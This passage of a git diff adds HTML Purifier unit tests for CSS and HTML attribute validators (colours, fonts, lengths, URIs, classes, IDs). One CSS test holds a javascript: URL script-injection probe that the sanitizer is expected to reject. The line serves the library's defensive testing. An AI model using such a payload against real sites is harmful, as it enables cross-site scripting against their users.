0%)', 'rgb(100%,0%,0%)'); + $this->assertDef('rgb(256,-23,34)', 'rgb(255,0,34)'); + + // color keywords, of course + $this->assertDef('red', '#FF0000'); + + // malformed hex declaration + $this->assertDef('808080', '#808080'); + $this->assertDef('000000', '#000000'); + $this->assertDef('fed', '#fed'); + + // maybe hex transformations would be another nice feature + // at the very least transform rgb percent to rgb integer + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/CompositeTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/CompositeTest.php new file mode 100644 index 000000000..44bef5551 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/CompositeTest.php @@ -0,0 +1,81 @@ +<?php + +class HTMLPurifier_AttrDef_CSS_Composite_Testable extends + HTMLPurifier_AttrDef_CSS_Composite +{ + + // we need to pass by ref to get the mocks in + function HTMLPurifier_AttrDef_CSS_Composite_Testable(&$defs) { + $this->defs =& $defs; + } + +} + +class HTMLPurifier_AttrDef_CSS_CompositeTest extends HTMLPurifier_AttrDefHarness +{ + + protected $def1, $def2; + + function test() { + + generate_mock_once('HTMLPurifier_AttrDef'); + + $config = HTMLPurifier_Config::createDefault(); + $context = new HTMLPurifier_Context(); + + // first test: value properly validates on first definition + // so second def is never called + + $def1 = new HTMLPurifier_AttrDefMock(); + $def2 = new HTMLPurifier_AttrDefMock(); + $defs = array(&$def1, &$def2); + $def = new HTMLPurifier_AttrDef_CSS_Composite_Testable($defs); + $input = 'FOOBAR'; + $output = 'foobar'; + $def1_params = array($input, $config, $context); + $def1->expectOnce('validate', $def1_params); + $def1->setReturnValue('validate', $output, $def1_params); + $def2->expectNever('validate'); + + $result = $def->validate($input, $config, $context); + $this->assertIdentical($output, $result); + + // second test, first def fails, second def works + + $def1 = new HTMLPurifier_AttrDefMock(); + $def2 = new HTMLPurifier_AttrDefMock(); + $defs = array(&$def1, &$def2); + $def = new HTMLPurifier_AttrDef_CSS_Composite_Testable($defs); + $input = 'BOOMA'; + $output = 'booma'; + $def_params = array($input, $config, $context); + $def1->expectOnce('validate', $def_params); + $def1->setReturnValue('validate', false, $def_params); + $def2->expectOnce('validate', $def_params); + $def2->setReturnValue('validate', $output, $def_params); + + $result = $def->validate($input, $config, $context); + $this->assertIdentical($output, $result); + + // third test, all fail, so composite faiils + + $def1 = new HTMLPurifier_AttrDefMock(); + $def2 = new HTMLPurifier_AttrDefMock(); + $defs = array(&$def1, &$def2); + $def = new HTMLPurifier_AttrDef_CSS_Composite_Testable($defs); + $input = 'BOOMA'; + $output = false; + $def_params = array($input, $config, $context); + $def1->expectOnce('validate', $def_params); + $def1->setReturnValue('validate', false, $def_params); + $def2->expectOnce('validate', $def_params); + $def2->setReturnValue('validate', false, $def_params); + + $result = $def->validate($input, $config, $context); + $this->assertIdentical($output, $result); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/FilterTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/FilterTest.php new file mode 100644 index 000000000..7795643f1 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/FilterTest.php @@ -0,0 +1,29 @@ +<?php + +class HTMLPurifier_AttrDef_CSS_FilterTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $this->def = new HTMLPurifier_AttrDef_CSS_Filter(); + + $this->assertDef('none'); + + $this->assertDef('alpha(opacity=0)'); + $this->assertDef('alpha(opacity=100)'); + $this->assertDef('alpha(opacity=50)'); + $this->assertDef('alpha(opacity=342)', 'alpha(opacity=100)'); + $this->assertDef('alpha(opacity=-23)', 'alpha(opacity=0)'); + + $this->assertDef('alpha ( opacity = 0 )', 'alpha(opacity=0)'); + $this->assertDef('alpha(opacity=0,opacity=100)', 'alpha(opacity=0)'); + + $this->assertDef('progid:DXImageTransform.Microsoft.Alpha(opacity=20)'); + + $this->assertDef('progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)', false); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/FontFamilyTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/FontFamilyTest.php new file mode 100644 index 000000000..fda8e01ff --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/FontFamilyTest.php @@ -0,0 +1,52 @@ +<?php + +class HTMLPurifier_AttrDef_CSS_FontFamilyTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $this->def = new HTMLPurifier_AttrDef_CSS_FontFamily(); + + $this->assertDef('Gill, Helvetica, sans-serif'); + $this->assertDef("'Times New Roman', serif"); + $this->assertDef("\"Times New Roman\"", "'Times New Roman'"); + $this->assertDef('01234'); + $this->assertDef(',', false); + $this->assertDef('Times New Roman, serif', "'Times New Roman', serif"); + $this->assertDef($d = "'\xE5\xAE\x8B\xE4\xBD\x93'"); + $this->assertDef("\xE5\xAE\x8B\xE4\xBD\x93", $d); + $this->assertDef("'\\01'", "''"); + $this->assertDef("'\\20'", "' '"); + $this->assertDef("\\0020", "' '"); + $this->assertDef("'\\000045'", "E"); + $this->assertDef("','", false); + $this->assertDef("',' foobar','", "' foobar'"); + $this->assertDef("'\\000045a'", "Ea"); + $this->assertDef("'\\00045 a'", "Ea"); + $this->assertDef("'\\00045 a'", "'E a'"); + $this->assertDef("'\\\nf'", "f"); + // No longer supported, except maybe in NoJS mode (see source + // file for more explanation) + //$this->assertDef($d = '"John\'s Font"'); + //$this->assertDef("John's Font", $d); + //$this->assertDef("'\\','f'", "\"\\5C \", f"); + //$this->assertDef("'\\27'", "\"'\""); + //$this->assertDef('"\\22"', "\"\\22 \""); + //$this->assertDef('"\\""', "\"\\22 \""); + //$this->assertDef('"\'"', "\"'\""); + } + + function testAllowed() { + $this->config->set('CSS.AllowedFonts', array('serif', 'Times New Roman')); + + $this->assertDef('serif'); + $this->assertDef('sans-serif', false); + $this->assertDef('serif, sans-serif', 'serif'); + $this->assertDef('Times New Roman', "'Times New Roman'"); + $this->assertDef("'Times New Roman'"); + $this->assertDef('foo', false); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/FontTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/FontTest.php new file mode 100644 index 000000000..91870d13e --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/FontTest.php @@ -0,0 +1,34 @@ +<?php + +class HTMLPurifier_AttrDef_CSS_FontTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $config = HTMLPurifier_Config::createDefault(); + $this->def = new HTMLPurifier_AttrDef_CSS_Font($config); + + // hodgepodge of usage cases from W3C spec, but " -> ' + $this->assertDef('12px/14px sans-serif'); + $this->assertDef('80% sans-serif'); + $this->assertDef("x-large/110% 'New Century Schoolbook', serif"); + $this->assertDef('bold italic large Palatino, serif'); + $this->assertDef('normal small-caps 120%/120% fantasy'); + $this->assertDef("300 italic 1.3em/1.7em 'FB Armada', sans-serif"); + $this->assertDef('600 9px Charcoal'); + $this->assertDef('600 9px/ 12px Charcoal', '600 9px/12px Charcoal'); + + // spacing + $this->assertDef('12px / 14px sans-serif', '12px/14px sans-serif'); + + // system fonts + $this->assertDef('menu'); + + $this->assertDef('800', false); + $this->assertDef('600 9px//12px Charcoal', false); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/ImportantDecoratorTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/ImportantDecoratorTest.php new file mode 100644 index 000000000..c7fa8a0fa --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/ImportantDecoratorTest.php @@ -0,0 +1,49 @@ +<?php + +class HTMLPurifier_AttrDef_CSS_ImportantDecoratorTest extends HTMLPurifier_AttrDefHarness +{ + + /** Mock AttrDef decorator is wrapping */ + protected $mock; + + function setUp() { + generate_mock_once('HTMLPurifier_AttrDef'); + $this->mock = new HTMLPurifier_AttrDefMock(); + $this->def = new HTMLPurifier_AttrDef_CSS_ImportantDecorator($this->mock, true); + } + + protected function setMock($input, $output = null) { + if ($output === null) $output = $input; + $this->mock->expectOnce('validate', array($input, $this->config, $this->context)); + $this->mock->setReturnValue('validate', $output); + } + + function testImportant() { + $this->setMock('23'); + $this->assertDef('23 !important'); + } + + function testImportantInternalDefChanged() { + $this->setMock('23', '24'); + $this->assertDef('23 !important', '24 !important'); + } + + function testImportantWithSpace() { + $this->setMock('23'); + $this->assertDef('23 ! important ', '23 !important'); + } + + function testFakeImportant() { + $this->setMock('! foo important'); + $this->assertDef('! foo important'); + } + + function testStrip() { + $this->def = new HTMLPurifier_AttrDef_CSS_ImportantDecorator($this->mock, false); + $this->setMock('23'); + $this->assertDef('23 ! important ', '23'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/LengthTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/LengthTest.php new file mode 100644 index 000000000..9d9fc41f2 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/LengthTest.php @@ -0,0 +1,48 @@ +<?php + +class HTMLPurifier_AttrDef_CSS_LengthTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $this->def = new HTMLPurifier_AttrDef_CSS_Length(); + + $this->assertDef('0'); + $this->assertDef('0px'); + $this->assertDef('4.5px'); + $this->assertDef('-4.5px'); + $this->assertDef('3ex'); + $this->assertDef('3em'); + $this->assertDef('3in'); + $this->assertDef('3cm'); + $this->assertDef('3mm'); + $this->assertDef('3pt'); + $this->assertDef('3pc'); + + $this->assertDef('3PX', '3px'); + + $this->assertDef('3', false); + $this->assertDef('3miles', false); + + } + + function testNonNegative() { + + $this->def = new HTMLPurifier_AttrDef_CSS_Length('0'); + + $this->assertDef('3cm'); + $this->assertDef('-3mm', false); + + } + + function testBounding() { + $this->def = new HTMLPurifier_AttrDef_CSS_Length('-1in', '1in'); + $this->assertDef('1cm'); + $this->assertDef('-1cm'); + $this->assertDef('0'); + $this->assertDef('1em', false); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/ListStyleTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/ListStyleTest.php new file mode 100644 index 000000000..070066705 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/ListStyleTest.php @@ -0,0 +1,35 @@ +<?php + +class HTMLPurifier_AttrDef_CSS_ListStyleTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $config = HTMLPurifier_Config::createDefault(); + $this->def = new HTMLPurifier_AttrDef_CSS_ListStyle($config); + + $this->assertDef('lower-alpha'); + $this->assertDef('upper-roman inside'); + $this->assertDef('circle outside'); + $this->assertDef('inside'); + $this->assertDef('none'); + $this->assertDef('url("foo.gif")'); + $this->assertDef('circle url("foo.gif") inside'); + + // invalid values + $this->assertDef('outside inside', 'outside'); + + // ordering + $this->assertDef('url(foo.gif) none', 'none url("foo.gif")'); + $this->assertDef('circle lower-alpha', 'circle'); + // the spec is ambiguous about what happens in these + // cases, so we're going off the W3C CSS validator + $this->assertDef('disc none', 'disc'); + $this->assertDef('none disc', 'none'); + + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/MultipleTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/MultipleTest.php new file mode 100644 index 000000000..4461cb508 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/MultipleTest.php @@ -0,0 +1,28 @@ +<?php + +// borrowed for the sakes of this test +class HTMLPurifier_AttrDef_CSS_MultipleTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + $this->def = new HTMLPurifier_AttrDef_CSS_Multiple( + new HTMLPurifier_AttrDef_Integer() + ); + + $this->assertDef('1 2 3 4'); + $this->assertDef('6'); + $this->assertDef('4 5'); + $this->assertDef(' 2 54 2 3', '2 54 2 3'); + $this->assertDef("6\r3", '6 3'); + + $this->assertDef('asdf', false); + $this->assertDef('a s d f', false); + $this->assertDef('1 2 3 4 5', '1 2 3 4'); + $this->assertDef('1 2 invalid 3', '1 2 3'); + + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/NumberTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/NumberTest.php new file mode 100644 index 000000000..94e6ea8cf --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/NumberTest.php @@ -0,0 +1,51 @@ +<?php + +class HTMLPurifier_AttrDef_CSS_NumberTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $this->def = new HTMLPurifier_AttrDef_CSS_Number(); + + $this->assertDef('0'); + $this->assertDef('0.0', '0'); + $this->assertDef('1.0', '1'); + $this->assertDef('34'); + $this->assertDef('4.5'); + $this->assertDef('.5'); + $this->assertDef('0.5', '.5'); + $this->assertDef('-56.9'); + + $this->assertDef('0.', '0'); + $this->assertDef('.0', '0'); + $this->assertDef('0.0', '0'); + + $this->assertDef('1.', '1'); + $this->assertDef('.1', '.1'); + + $this->assertDef('1.0', '1'); + $this->assertDef('0.1', '.1'); + + $this->assertDef('000', '0'); + $this->assertDef(' 9', '9'); + $this->assertDef('+5.0000', '5'); + $this->assertDef('02.20', '2.2'); + $this->assertDef('2.', '2'); + + $this->assertDef('.', false); + $this->assertDef('asdf', false); + $this->assertDef('0.5.6', false); + + } + + function testNonNegative() { + + $this->def = new HTMLPurifier_AttrDef_CSS_Number(true); + $this->assertDef('23'); + $this->assertDef('-12', false); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/PercentageTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/PercentageTest.php new file mode 100644 index 000000000..f712af1d2 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/PercentageTest.php @@ -0,0 +1,24 @@ +<?php + +class HTMLPurifier_AttrDef_CSS_PercentageTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $this->def = new HTMLPurifier_AttrDef_CSS_Percentage(); + + $this->assertDef('10%'); + $this->assertDef('1.607%'); + $this->assertDef('-567%'); + + $this->assertDef(' 100% ', '100%'); + + $this->assertDef('5', false); + $this->assertDef('asdf', false); + $this->assertDef('%', false); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/TextDecorationTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/TextDecorationTest.php new file mode 100644 index 000000000..dd714d206 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/TextDecorationTest.php @@ -0,0 +1,27 @@ +<?php + +class HTMLPurifier_AttrDef_CSS_TextDecorationTest extends HTMLPurifier_AttrDefHarness +{ + + function testCaseInsensitive() { + + $this->def = new HTMLPurifier_AttrDef_CSS_TextDecoration(); + + $this->assertDef('none'); + $this->assertDef('none underline', 'underline'); + + $this->assertDef('underline'); + $this->assertDef('overline'); + $this->assertDef('line-through overline underline'); + $this->assertDef('overline line-through'); + $this->assertDef('UNDERLINE', 'underline'); + $this->assertDef(' underline line-through ', 'underline line-through'); + + $this->assertDef('foobar underline', 'underline'); + $this->assertDef('blink', false); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/URITest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/URITest.php new file mode 100644 index 000000000..3d6f5791e --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSS/URITest.php @@ -0,0 +1,29 @@ +<?php + +class HTMLPurifier_AttrDef_CSS_URITest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $this->def = new HTMLPurifier_AttrDef_CSS_URI(); + + $this->assertDef('', false); + + // we could be nice but we won't be + $this->assertDef('http://www.example.com/', false); + + $this->assertDef('url(', false); + $this->assertDef('url("")', true); + $result = 'url("http://www.example.com/")'; + $this->assertDef('url(http://www.example.com/)', $result); + $this->assertDef('url("http://www.example.com/")', $result); + $this->assertDef("url('http://www.example.com/')", $result); + $this->assertDef( + ' url( "http://www.example.com/" ) ', $result); + $this->assertDef("url(http://www.example.com/foo,bar\)\'\()", + 'url("http://www.example.com/foo,bar%29%27%28")'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSSTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSSTest.php new file mode 100644 index 000000000..56917aece --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/CSSTest.php @@ -0,0 +1,164 @@ +<?php + +class HTMLPurifier_AttrDef_CSSTest extends HTMLPurifier_AttrDefHarness +{ + + function setup() { + parent::setup(); + $this->def = new HTMLPurifier_AttrDef_CSS(); + } + + function test() { + + // regular cases, singular + $this->assertDef('text-align:right;'); + $this->assertDef('border-left-style:solid;'); + $this->assertDef('border-style:solid dotted;'); + $this->assertDef('clear:right;'); + $this->assertDef('float:left;'); + $this->assertDef('font-style:italic;'); + $this->assertDef('font-variant:small-caps;'); + $this->assertDef('font-weight:bold;'); + $this->assertDef('list-style-position:outside;'); + $this->assertDef('list-style-type:upper-roman;'); + $this->assertDef('list-style:upper-roman inside;'); + $this->assertDef('text-transform:capitalize;'); + $this->assertDef('background-color:rgb(0,0,255);'); + $this->assertDef('background-color:transparent;'); + $this->assertDef('background:#333 url("chess.png") repeat fixed 50% top;'); + $this->assertDef('color:#F00;'); + $this->assertDef('border-top-color:#F00;'); + $this->assertDef('border-color:#F00 #FF0;'); + $this->assertDef('border-top-width:thin;'); + $this->assertDef('border-top-width:12px;'); + $this->assertDef('border-width:5px 1px 4px 2px;'); + $this->assertDef('border-top-width:-12px;', false); + $this->assertDef('letter-spacing:normal;'); + $this->assertDef('letter-spacing:2px;'); + $this->assertDef('word-spacing:normal;'); + $this->assertDef('word-spacing:3em;'); + $this->assertDef('font-size:200%;'); + $this->assertDef('font-size:larger;'); + $this->assertDef('font-size:12pt;'); + $this->assertDef('line-height:2;'); + $this->assertDef('line-height:2em;'); + $this->assertDef('line-height:20%;'); + $this->assertDef('line-height:normal;'); + $this->assertDef('line-height:-20%;', false); + $this->assertDef('margin-left:5px;'); + $this->assertDef('margin-right:20%;'); + $this->assertDef('margin-top:auto;'); + $this->assertDef('margin:auto 5%;'); + $this->assertDef('padding-bottom:5px;'); + $this->assertDef('padding-top:20%;'); + $this->assertDef('padding:20% 10%;'); + $this->assertDef('padding-top:-20%;', false); + $this->assertDef('text-indent:3em;'); + $this->assertDef('text-indent:5%;'); + $this->assertDef('text-indent:-3em;'); + $this->assertDef('width:50%;'); + $this->assertDef('width:50px;'); + $this->assertDef('width:auto;'); + $this->assertDef('width:-50px;', false); + $this->assertDef('text-decoration:underline;'); + $this->assertDef('font-family:sans-serif;'); + $this->assertDef("font-family:Gill, 'Times New Roman', sans-serif;"); + $this->assertDef('font:12px serif;'); + $this->assertDef('border:1px solid #000;'); + $this->assertDef('border-bottom:2em double #FF00FA;'); + $this->assertDef('border-collapse:collapse;'); + $this->assertDef('border-collapse:separate;'); + $this->assertDef('caption-side:top;'); + $this->assertDef('vertical-align:middle;'); + $this->assertDef('vertical-align:12px;'); + $this->assertDef('vertical-align:50%;'); + $this->assertDef('table-layout:fixed;'); + $this->assertDef('list-style-image:url("nice.jpg");'); + $this->assertDef('list-style:disc url("nice.jpg") inside;'); + $this->assertDef('background-image:url("foo.jpg");'); + $this->assertDef('background-image:none;'); + $this->assertDef('background-repeat:repeat-y;'); + $this->assertDef('background-attachment:fixed;'); + $this->assertDef('background-position:left 90%;'); + $this->assertDef('border-spacing:1em;'); + $this->assertDef('border-spacing:1em 2em;'); + + // duplicates + $this->assertDef('text-align:right;text-align:left;', + 'text-align:left;'); + + // a few composites + $this->assertDef('font-variant:small-caps;font-weight:900;'); + $this->assertDef('float:right;text-align:right;'); + + // selective removal + $this->assertDef('text-transform:capitalize;destroy:it;', + 'text-transform:capitalize;'); + + // inherit works for everything + $this->assertDef('text-align:inherit;'); + + // bad props + $this->assertDef('nodice:foobar;', false); + $this->assertDef('position:absolute;', false); + $this->assertDef('background-image:url(\'javascript:alert\(\)\');', false); + + // airy input + $this->assertDef(' font-weight : bold; color : #ff0000', + 'font-weight:bold;color:#ff0000;'); + + // case-insensitivity + $this->assertDef('FLOAT:LEFT;', 'float:left;'); + + // !important stripping + $this->assertDef('float:left !important;', 'float:left;'); + + } + + function testProprietary() { + $this->config->set('CSS.Proprietary', true); + + $this->assertDef('scrollbar-arrow-color:#ff0;'); + $this->assertDef('scrollbar-base-color:#ff6347;'); + $this->assertDef('scrollbar-darkshadow-color:#ffa500;'); + $this->assertDef('scrollbar-face-color:#008080;'); + $this->assertDef('scrollbar-highlight-color:#ff69b4;'); + $this->assertDef('scrollbar-shadow-color:#f0f;'); + + $this->assertDef('opacity:.2;'); + $this->assertDef('-moz-opacity:.2;'); + $this->assertDef('-khtml-opacity:.2;'); + $this->assertDef('filter:alpha(opacity=20);'); + + } + + function testImportant() { + $this->config->set('CSS.AllowImportant', true); + $this->assertDef('float:left !important;'); + } + + function testTricky() { + $this->config->set('CSS.AllowTricky', true); + $this->assertDef('display:none;'); + $this->assertDef('visibility:visible;'); + $this->assertDef('overflow:scroll;'); + } + + function testForbidden() { + $this->config->set('CSS.ForbiddenProperties', 'float'); + $this->assertDef('float:left;', false); + $this->assertDef('text-align:right;'); + } + + function testTrusted() { + $this->config->set('CSS.Trusted', true); + $this->assertDef('position:relative;'); + $this->assertDef('left:2px;'); + $this->assertDef('right:100%;'); + $this->assertDef('top:auto;'); + $this->assertDef('z-index:-2;'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/EnumTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/EnumTest.php new file mode 100644 index 000000000..7722c1bc2 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/EnumTest.php @@ -0,0 +1,37 @@ +<?php + +class HTMLPurifier_AttrDef_EnumTest extends HTMLPurifier_AttrDefHarness +{ + + function testCaseInsensitive() { + $this->def = new HTMLPurifier_AttrDef_Enum(array('one', 'two')); + $this->assertDef('one'); + $this->assertDef('ONE', 'one'); + } + + function testCaseSensitive() { + $this->def = new HTMLPurifier_AttrDef_Enum(array('one', 'two'), true); + $this->assertDef('one'); + $this->assertDef('ONE', false); + } + + function testFixing() { + $this->def = new HTMLPurifier_AttrDef_Enum(array('one')); + $this->assertDef(' one ', 'one'); + } + + function test_make() { + $factory = new HTMLPurifier_AttrDef_Enum(); + + $def = $factory->make('foo,bar'); + $def2 = new HTMLPurifier_AttrDef_Enum(array('foo', 'bar')); + $this->assertIdentical($def, $def2); + + $def = $factory->make('s:foo,BAR'); + $def2 = new HTMLPurifier_AttrDef_Enum(array('foo', 'BAR'), true); + $this->assertIdentical($def, $def2); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/BoolTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/BoolTest.php new file mode 100644 index 000000000..060d0fc8f --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/BoolTest.php @@ -0,0 +1,22 @@ +<?php + +class HTMLPurifier_AttrDef_HTML_BoolTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + $this->def = new HTMLPurifier_AttrDef_HTML_Bool('foo'); + $this->assertDef('foo'); + $this->assertDef('', false); + $this->assertDef('bar', 'foo'); + } + + function test_make() { + $factory = new HTMLPurifier_AttrDef_HTML_Bool(); + $def = $factory->make('foo'); + $def2 = new HTMLPurifier_AttrDef_HTML_Bool('foo'); + $this->assertIdentical($def, $def2); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/ClassTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/ClassTest.php new file mode 100644 index 000000000..6effd3cde --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/ClassTest.php @@ -0,0 +1,48 @@ +<?php + +class HTMLPurifier_AttrDef_HTML_ClassTest extends HTMLPurifier_AttrDef_HTML_NmtokensTest +{ + function setUp() { + parent::setUp(); + $this->def = new HTMLPurifier_AttrDef_HTML_Class(); + } + function testAllowedClasses() { + $this->config->set('Attr.AllowedClasses', array('foo')); + $this->assertDef('foo'); + $this->assertDef('bar', false); + $this->assertDef('foo bar', 'foo'); + } + function testForbiddenClasses() { + $this->config->set('Attr.ForbiddenClasses', array('bar')); + $this->assertDef('foo'); + $this->assertDef('bar', false); + $this->assertDef('foo bar', 'foo'); + } + function testDefault() { + $this->assertDef('valid'); + $this->assertDef('a0-_'); + $this->assertDef('-valid'); + $this->assertDef('_valid'); + $this->assertDef('double valid'); + + $this->assertDef('0stillvalid'); + $this->assertDef('-0'); + + // test conditional replacement + $this->assertDef('validassoc 0valid', 'validassoc 0valid'); + + // test whitespace leniency + $this->assertDef(" double\nvalid\r", 'double valid'); + + // test case sensitivity + $this->assertDef('VALID'); + + // test duplicate removal + $this->assertDef('valid valid', 'valid'); + } + function testXHTML11Behavior() { + $this->config->set('HTML.Doctype', 'XHTML 1.1'); + $this->assertDef('0invalid', false); + $this->assertDef('valid valid', 'valid'); + } +} diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/ColorTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/ColorTest.php new file mode 100644 index 000000000..8b4a46347 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/ColorTest.php @@ -0,0 +1,20 @@ +<?php + +class HTMLPurifier_AttrDef_HTML_ColorTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + $this->def = new HTMLPurifier_AttrDef_HTML_Color(); + $this->assertDef('', false); + $this->assertDef('foo', false); + $this->assertDef('43', false); + $this->assertDef('red', '#FF0000'); + $this->assertDef('#FF0000'); + $this->assertDef('#453443'); + $this->assertDef('453443', '#453443'); + $this->assertDef('#345', '#334455'); + $this->assertDef('120', '#112200'); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/FrameTargetTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/FrameTargetTest.php new file mode 100644 index 000000000..7d3e24c75 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/FrameTargetTest.php @@ -0,0 +1,28 @@ +<?php + +class HTMLPurifier_AttrDef_HTML_FrameTargetTest extends HTMLPurifier_AttrDefHarness +{ + + function setup() { + parent::setup(); + $this->def = new HTMLPurifier_AttrDef_HTML_FrameTarget(); + } + + function testNoneAllowed() { + $this->assertDef('', false); + $this->assertDef('foo', false); + $this->assertDef('_blank', false); + $this->assertDef('baz', false); + } + + function test() { + $this->config->set('Attr.AllowedFrameTargets', 'foo,_blank'); + $this->assertDef('', false); + $this->assertDef('foo'); + $this->assertDef('_blank'); + $this->assertDef('baz', false); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/IDTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/IDTest.php new file mode 100644 index 000000000..245db16da --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/IDTest.php @@ -0,0 +1,108 @@ +<?php + +class HTMLPurifier_AttrDef_HTML_IDTest extends HTMLPurifier_AttrDefHarness +{ + + function setUp() { + parent::setUp(); + + $id_accumulator = new HTMLPurifier_IDAccumulator(); + $this->context->register('IDAccumulator', $id_accumulator); + $this->config->set('Attr.EnableID', true); + $this->def = new HTMLPurifier_AttrDef_HTML_ID(); + + } + + function test() { + + // valid ID names + $this->assertDef('alpha'); + $this->assertDef('al_ha'); + $this->assertDef('a0-:.'); + $this->assertDef('a'); + + // invalid ID names + $this->assertDef('<asa', false); + $this->assertDef('0123', false); + $this->assertDef('.asa', false); + + // test duplicate detection + $this->assertDef('once'); + $this->assertDef('once', false); + + // valid once whitespace stripped, but needs to be amended + $this->assertDef(' whee ', 'whee'); + + } + + function testPrefix() { + + $this->config->set('Attr.IDPrefix', 'user_'); + + $this->assertDef('alpha', 'user_alpha'); + $this->assertDef('<asa', false); + $this->assertDef('once', 'user_once'); + $this->assertDef('once', false); + + // if already prefixed, leave alone + $this->assertDef('user_alas'); + $this->assertDef('user_user_alas'); // how to bypass + + } + + function testTwoPrefixes() { + + $this->config->set('Attr.IDPrefix', 'user_'); + $this->config->set('Attr.IDPrefixLocal', 'story95_'); + + $this->assertDef('alpha', 'user_story95_alpha'); + $this->assertDef('<asa', false); + $this->assertDef('once', 'user_story95_once'); + $this->assertDef('once', false); + + $this->assertDef('user_story95_alas'); + $this->assertDef('user_alas', 'user_story95_user_alas'); // ! + } + + function testLocalPrefixWithoutMainPrefix() { + // no effect when IDPrefix isn't set + 